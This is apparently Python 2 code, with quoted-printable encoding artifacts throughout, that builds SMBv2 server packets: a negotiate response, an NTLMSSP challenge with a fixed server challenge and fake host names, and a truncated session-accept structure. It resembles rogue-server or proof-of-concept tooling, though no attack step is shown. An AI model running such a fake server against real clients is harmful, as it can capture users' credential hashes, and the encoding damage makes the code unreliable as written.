import sys, struct, SocketServer
from odict import OrderedDict
from datetime import datetime
from calendar import timegm

class Packet():
    fields =3D OrderedDict([
        ("data", ""),
    ])
    def __init__(self, **kw):
        self.fields =3D OrderedDict(self.__class__.fields)
        for k,v in kw.items():
            if callable(v):
                self.fields[k] =3D v(self.fields[k])
            else:
                self.fields[k] =3D v
    def __str__(self):
        return "".join(map(str, self.fields.values()))

def NTStamp(Time):
    NtStamp =3D 116444736000000000 + (timegm(Time.timetuple()) * 100000=
00)
    return struct.pack("Q", NtStamp + (Time.microsecond * 10))

def longueur(payload):
    length =3D struct.pack(">i", len(''.join(payload)))
    return length

def GrabMessageID(data):
    Messageid =3D data[28:36]
    return Messageid

def GrabCreditRequested(data):
    CreditsRequested =3D data[18:20]
    if CreditsRequested =3D=3D "\x00\x00":
       CreditsRequested =3D  "\x01\x00"
    else:
       CreditsRequested =3D data[18:20]
    return CreditsRequested

def GrabCreditCharged(data):
    CreditCharged =3D data[10:12]
    return CreditCharged

def GrabSessionID(data):
    SessionID =3D data[44:52]
    return SessionID

#######################################################################=
###########
class SMBv2Header(Packet):
    fields =3D OrderedDict([
        ("Proto",         "\xfe\x53\x4d\x42"),
        ("Len",           "\x40\x00"),
        ("CreditCharge",  "\x00\x00"),
        ("NTStatus",      "\x00\x00\x00\x00"),
        ("Cmd",           "\x00\x00"),
        ("Credits",       "\x01\x00"),
        ("Flags",         "\x01\x00\x00\x00"),
        ("NextCmd",       "\x00\x00\x00\x00"),
        ("MessageId",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("PID",           "\xff\xfe\x00\x00"),
        ("TID",           "\x00\x00\x00\x00"),
        ("SessionID",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
        ("Signature",     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=
\x00\x00\x00\x00\x00"),
    ])

#######################################################################=
###########
class SMB2NegoAns(Packet):
=09fields =3D OrderedDict([
=09=09("Len",             "\x41\x00"),
=09=09("Signing",         "\x01\x00"),
=09=09("Dialect",         "\xff\x02"),
=09=09("Reserved",        "\x00\x00"),
=09=09("Guid",            "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92=
\x47\x6d\xeb\x72\xa9"),
=09=09("Capabilities",    "\x07\x00\x00\x00"),
=09=09("MaxTransSize",    "\x00\x00\x10\x00"),
=09=09("MaxReadSize",     "\x00\x00\x10\x00"),
=09=09("MaxWriteSize",    "\x00\x00\x10\x00"),
=09=09("SystemTime",      NTStamp(datetime.now())),
=09=09("BootTime",        "\x22\xfb\x80\x01\x40\x09\xd2\x01"),
=09=09("SecBlobOffSet",             "\x80\x00"),
=09=09("SecBlobLen",                "\x78\x00"),
=09=09("Reserved2",                 "\x4d\x53\x53\x50"),
=09=09("InitContextTokenASNId",     "\x60"),
=09=09("InitContextTokenASNLen",    "\x76"),
=09=09("ThisMechASNId",             "\x06"),
=09=09("ThisMechASNLen",            "\x06"),
=09=09("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),
=09=09("SpNegoTokenASNId",          "\xA0"),
=09=09("SpNegoTokenASNLen",         "\x6c"),
=09=09("NegTokenASNId",             "\x30"),
=09=09("NegTokenASNLen",            "\x6a"),
=09=09("NegTokenTag0ASNId",         "\xA0"),
=09=09("NegTokenTag0ASNLen",        "\x3c"),
=09=09("NegThisMechASNId",          "\x30"),
=09=09("NegThisMechASNLen",         "\x3a"),
=09=09("NegThisMech1ASNId",         "\x06"),
=09=09("NegThisMech1ASNLen",        "\x0a"),
=09=09("NegThisMech1ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x=
02\x1e"),
=09=09("NegThisMech2ASNId",         "\x06"),
=09=09("NegThisMech2ASNLen",        "\x09"),
=09=09("NegThisMech2ASNStr",        "\x2a\x86\x48\x82\xf7\x12\x01\x02\x=
02"),
=09=09("NegThisMech3ASNId",         "\x06"),
=09=09("NegThisMech3ASNLen",        "\x09"),
=09=09("NegThisMech3ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x=
02"),
=09=09("NegThisMech4ASNId",         "\x06"),
=09=09("NegThisMech4ASNLen",        "\x0a"),
=09=09("NegThisMech4ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x=
02\x03"),
=09=09("NegThisMech5ASNId",         "\x06"),
=09=09("NegThisMech5ASNLen",        "\x0a"),
=09=09("NegThisMech5ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x=
02\x0a"),
=09=09("NegTokenTag3ASNId",         "\xA3"),
=09=09("NegTokenTag3ASNLen",        "\x2a"),
=09=09("NegHintASNId",              "\x30"),
=09=09("NegHintASNLen",             "\x28"),
=09=09("NegHintTag0ASNId",          "\xa0"),
=09=09("NegHintTag0ASNLen",         "\x26"),
=09=09("NegHintFinalASNId",         "\x1b"),=20
=09=09("NegHintFinalASNLen",        "\x24"),
=09=09("NegHintFinalASNStr",        "Server2009@SMB3.local"),
=09=09("Data",                      ""),
=09])

=09def calculate(self):


=09=09StructLen =3D str(self.fields["Len"])+str(self.fields["Signing"])=
+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fiel=
ds["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransS=
ize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])=
+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.f=
ields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields[=
"Reserved2"])
                =20
=09=09SecBlobLen =3D str(self.fields["InitContextTokenASNId"])+str(self=
.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+st=
r(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str=
(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])=
+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+s=
tr(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLe=
n"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechA=
SNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThis=
Mech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["=
NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fi=
elds["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(s=
elf.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"]=
)+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4AS=
NLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThis=
Mech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["N=
egThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fie=
lds["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fi=
elds["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fi=
elds["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(se=
lf.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])


=09=09AsnLenStart =3D str(self.fields["ThisMechASNId"])+str(self.fields=
["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields[=
"SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fie=
lds["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.field=
s["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self=
.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(=
self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"]=
)+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2A=
SNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThis=
Mech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["N=
egThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fi=
elds["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(s=
elf.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])=
+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5AS=
NStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegToken=
Tag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHint=
ASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHint=
Tag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["Ne=
gHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

=09=09AsnLen2 =3D str(self.fields["NegTokenASNId"])+str(self.fields["Ne=
gTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["=
NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fie=
lds["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(sel=
f.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+=
str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNL=
en"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMe=
ch3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["Neg=
ThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.field=
s["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(sel=
f.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+s=
tr(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNI=
d"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASN=
Id"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASN=
Id"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFin=
alASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegH=
intFinalASNStr"])

=09=09MechTypeLen =3D str(self.fields["NegThisMechASNId"])+str(self.fie=
lds["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(sel=
f.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+=
str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNL=
en"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMe=
ch3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["Neg=
ThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.field=
s["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(sel=
f.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+s=
tr(self.fields["NegThisMech5ASNStr"])

=09=09Tag3Len =3D str(self.fields["NegHintASNId"])+str(self.fields["Neg=
HintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["Neg=
HintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields=
["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

                #Sec Blob lens
=09=09self.fields["SecBlobOffSet"] =3D struct.pack("<h",len(StructLen)+=
64)
=09=09self.fields["SecBlobLen"] =3D struct.pack("<h",len(SecBlobLen))
                #ASN Stuff
=09=09self.fields["InitContextTokenASNLen"] =3D struct.pack("<B", len(S=
ecBlobLen)-2)
=09=09self.fields["ThisMechASNLen"] =3D struct.pack("<B", len(str(self.=
fields["ThisMechASNStr"])))
=09=09self.fields["SpNegoTokenASNLen"] =3D struct.pack("<B", len(AsnLen=
2))
=09=09self.fields["NegTokenASNLen"] =3D struct.pack("<B", len(AsnLen2)-=
2)
=09=09self.fields["NegTokenTag0ASNLen"] =3D struct.pack("<B", len(MechT=
ypeLen))
=09=09self.fields["NegThisMech1ASNLen"] =3D struct.pack("<B", len(str(s=
elf.fields["NegThisMech1ASNStr"])))
=09=09self.fields["NegThisMech2ASNLen"] =3D struct.pack("<B", len(str(s=
elf.fields["NegThisMech2ASNStr"])))
=09=09self.fields["NegThisMech3ASNLen"] =3D struct.pack("<B", len(str(s=
elf.fields["NegThisMech3ASNStr"])))
=09=09self.fields["NegThisMech4ASNLen"] =3D struct.pack("<B", len(str(s=
elf.fields["NegThisMech4ASNStr"])))
=09=09self.fields["NegThisMech5ASNLen"] =3D struct.pack("<B", len(str(s=
elf.fields["NegThisMech5ASNStr"])))
=09=09self.fields["NegTokenTag3ASNLen"] =3D struct.pack("<B", len(Tag3L=
en))
=09=09self.fields["NegHintASNLen"] =3D struct.pack("<B", len(Tag3Len)-2=
)
=09=09self.fields["NegHintTag0ASNLen"] =3D struct.pack("<B", len(Tag3Le=
n)-4)
=09=09self.fields["NegHintFinalASNLen"] =3D struct.pack("<B", len(str(s=
elf.fields["NegHintFinalASNStr"])))

#######################################################################=
###########
class SMB2Session1Data(Packet):
=09fields =3D OrderedDict([
=09=09("Len",             "\x09\x00"),
=09=09("SessionFlag",     "\x01\x00"),
=09=09("SecBlobOffSet",   "\x48\x00"),
=09=09("SecBlobLen",      "\x06\x01"),
=09=09("ChoiceTagASNId",        "\xa1"),=20
=09=09("ChoiceTagASNLenOfLen",  "\x82"),=20
=09=09("ChoiceTagASNIdLen",     "\x01\x02"),
=09=09("NegTokenTagASNId",      "\x30"),
=09=09("NegTokenTagASNLenOfLen","\x81"),
=09=09("NegTokenTagASNIdLen",   "\xff"),
=09=09("Tag0ASNId",             "\xA0"),
=09=09("Tag0ASNIdLen",          "\x03"),
=09=09("NegoStateASNId",        "\x0A"),
=09=09("NegoStateASNLen",       "\x01"),
=09=09("NegoStateASNValue",     "\x01"),
=09=09("Tag1ASNId",             "\xA1"),
=09=09("Tag1ASNIdLen",          "\x0c"),
=09=09("Tag1ASNId2",            "\x06"),
=09=09("Tag1ASNId2Len",         "\x0A"),
=09=09("Tag1ASNId2Str",         "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x=
0a"),
=09=09("Tag2ASNId",             "\xA2"),
=09=09("Tag2ASNIdLenOfLen",     "\x81"),
=09=09("Tag2ASNIdLen",          "\xE9"),
=09=09("Tag3ASNId",             "\x04"),
=09=09("Tag3ASNIdLenOfLen",     "\x81"),
=09=09("Tag3ASNIdLen",          "\xE6"),
=09=09("NTLMSSPSignature",      "NTLMSSP"),
=09=09("NTLMSSPSignatureNull",  "\x00"),
=09=09("NTLMSSPMessageType",    "\x02\x00\x00\x00"),
=09=09("NTLMSSPNtWorkstationLen","\x1e\x00"),
=09=09("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
=09=09("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
=09=09("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
=09=09("NTLMSSPNtServerChallenge","\x82\x21\x32\x14\x51\x46\xe2\x83"),
=09=09("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
=09=09("NTLMSSPNtTargetInfoLen","\x94\x00"),
=09=09("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
=09=09("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
=09=09("NegTokenInitSeqMechMessageVersionHigh","\x06"),
=09=09("NegTokenInitSeqMechMessageVersionLow","\x03"),
=09=09("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"),
=09=09("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
=09=09("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
=09=09("NTLMSSPNtWorkstationName","SMB3"),
=09=09("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"),
=09=09("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"),=20
=09=09("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"),=20
=09=09("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.l=
ocal"),
=09=09("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"),
=09=09("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.now())=
),
=09=09("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
=09=09("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
=09])


=09def calculate(self):
=09=09###### Convert strings to Unicode
=09=09self.fields["NTLMSSPNtWorkstationName"] =3D self.fields["NTLMSSPN=
tWorkstationName"].encode('utf-16le')
=09=09self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] =3D self.fie=
lds["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] =3D self.fi=
elds["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] =3D self.fi=
elds["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] =3D self.fi=
elds["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] =3D self.fi=
elds["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
               =20
                #Packet struct calc:
=09=09StructLen =3D str(self.fields["Len"])+str(self.fields["SessionFla=
g"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])
=09=09###### SecBlobLen Calc:
=09=09CalculateSecBlob =3D str(self.fields["NTLMSSPSignature"])+str(sel=
f.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"]=
)+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPN=
tWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"]=
)+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPN=
tServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fiel=
ds["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLe=
n"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields[=
"NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInit=
SeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessage=
VersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReser=
ved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+st=
r(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLM=
ChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"]=
)+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fi=
elds["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMCha=
llengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Unico=
deStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.field=
s["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChall=
engeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"=
])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields[=
"NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMCha=
llengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])=
+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.field=
s["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChalle=
ngeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeS=
tr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["=
NTLMSSPNTLMChallengeAVPairs6Len"])

=09=09AsnLen =3D str(self.fields["ChoiceTagASNId"])+str(self.fields["Ch=
oiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fi=
elds["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+st=
r(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str=
(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(se=
lf.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str=
(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fi=
elds["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["=
Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASN=
IdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASN=
Id"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdL=
en"])


                #Packet Struct len
=09=09self.fields["SecBlobLen"] =3D struct.pack("<H", len(AsnLen+Calcul=
ateSecBlob))
                self.fields["SecBlobOffSet"] =3D struct.pack("<h",len(S=
tructLen)+64)

=09=09###### ASN Stuff
                if len(CalculateSecBlob) > 255:
=09=09   self.fields["Tag3ASNIdLen"] =3D struct.pack(">H", len(Calculat=
eSecBlob))
                else:
                   self.fields["Tag3ASNIdLenOfLen"] =3D "\x81"
=09=09   self.fields["Tag3ASNIdLen"] =3D struct.pack(">B", len(Calculat=
eSecBlob))

                if len(AsnLen+CalculateSecBlob)-3 > 255:
=09=09   self.fields["ChoiceTagASNIdLen"] =3D struct.pack(">H", len(Asn=
Len+CalculateSecBlob)-4)
                else:
                   self.fields["ChoiceTagASNLenOfLen"] =3D "\x81"
=09=09   self.fields["ChoiceTagASNIdLen"] =3D struct.pack(">B", len(Asn=
Len+CalculateSecBlob)-3)

                if len(AsnLen+CalculateSecBlob)-7 > 255:
=09=09   self.fields["NegTokenTagASNIdLen"] =3D struct.pack(">H", len(A=
snLen+CalculateSecBlob)-8)
                else:
                   self.fields["NegTokenTagASNLenOfLen"] =3D "\x81"
=09=09   self.fields["NegTokenTagASNIdLen"] =3D struct.pack(">B", len(A=
snLen+CalculateSecBlob)-7)
               =20
                tag2length =3D CalculateSecBlob+str(self.fields["Tag3AS=
NId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNId=
Len"])

                if len(tag2length) > 255:
=09=09   self.fields["Tag2ASNIdLen"] =3D struct.pack(">H", len(tag2leng=
th))
                else:
                   self.fields["Tag2ASNIdLenOfLen"] =3D "\x81"
=09=09   self.fields["Tag2ASNIdLen"] =3D struct.pack(">B", len(tag2leng=
th))

=09=09self.fields["Tag1ASNIdLen"] =3D struct.pack(">B", len(str(self.fi=
elds["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["=
Tag1ASNId2Str"])))
=09=09self.fields["Tag1ASNId2Len"] =3D struct.pack(">B", len(str(self.f=
ields["Tag1ASNId2Str"])))

=09=09###### Workstation Offset
=09=09CalculateOffsetWorkstation =3D str(self.fields["NTLMSSPSignature"=
])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMes=
sageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields=
["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBu=
ffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields=
["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str=
(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTarge=
tInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(se=
lf.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["Ne=
gTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqM=
echMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVe=
rsionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLM=
Type"])

=09=09###### AvPairs Offset
=09=09CalculateLenAvpairs =3D str(self.fields["NTLMSSPNTLMChallengeAVPa=
irsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fi=
elds["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSP=
NTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs=
1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(sel=
f.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTL=
MChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2U=
nicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.f=
ields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMC=
hallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs=
5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fie=
lds["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTL=
MChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Le=
n"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.f=
ields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMCh=
allengeAVPairs6Len"])

=09=09##### Workstation Offset Calculation:
=09=09self.fields["NTLMSSPNtWorkstationBuffOffset"] =3D struct.pack("<i=
", len(CalculateOffsetWorkstation))
=09=09self.fields["NTLMSSPNtWorkstationLen"] =3D struct.pack("<h", len(=
str(self.fields["NTLMSSPNtWorkstationName"])))
=09=09self.fields["NTLMSSPNtWorkstationMaxLen"] =3D struct.pack("<h", l=
en(str(self.fields["NTLMSSPNtWorkstationName"])))

=09=09##### Target Offset Calculation:
=09=09self.fields["NTLMSSPNtTargetInfoBuffOffset"] =3D struct.pack("<i"=
, len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationN=
ame"])))
=09=09self.fields["NTLMSSPNtTargetInfoLen"] =3D struct.pack("<h", len(C=
alculateLenAvpairs))
=09=09self.fields["NTLMSSPNtTargetInfoMaxLen"] =3D struct.pack("<h", le=
n(CalculateLenAvpairs))
=09=09
=09=09##### IvPair Calculation:
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] =3D struct.pack("<=
h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] =3D struct.pack("<=
h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] =3D struct.pack("<=
h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] =3D struct.pack("<=
h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
=09=09self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] =3D struct.pack("<=
h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
=09=09self.fields["NTLMSSPNTLMChallengeAVPairsLen"] =3D struct.pack("<h=
", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))

class SMB2SessionAcceptData(Packet):
=09fields =3D OrderedDict([
=09=09("Len",                       "\x09\x00"),
=09=09("SessionFlag",               "\x01\x00"),
=09=09("SecBlobOffSet",             "\x48\x00"),
=09=09("SecBlobLen",                "\x1d\x00"),
=09=09("SecBlobTag0",               "\xa1"),=20
=09=09("SecBlobTag0Len",            "\x1b"),
=09=09("NegTokenResp",              "\x30"),=20
=09=09("NegTokenRespLen",           "\x19"),=20
=09=09("NegTokenRespTag0",          "\xa0"),=20
=09=09("NegTokenRespTag0Len",       "\x03"),=20
=09=09("NegStateResp",              "\x0a"),=20
=09=09("NegTokenRespLen1",           "\x01"),=20
=09=09("NegTokenRespStr",           "\x00"),
=09=09("SecBlobTag3",               "\xa3"),=20
=09=09("SecBlobTag3Len",            "\x12"),
=09=09("SecBlobOctetHeader",        "\x04"),=20
=09=09("SecBlobOctetLen",           "\x10"),
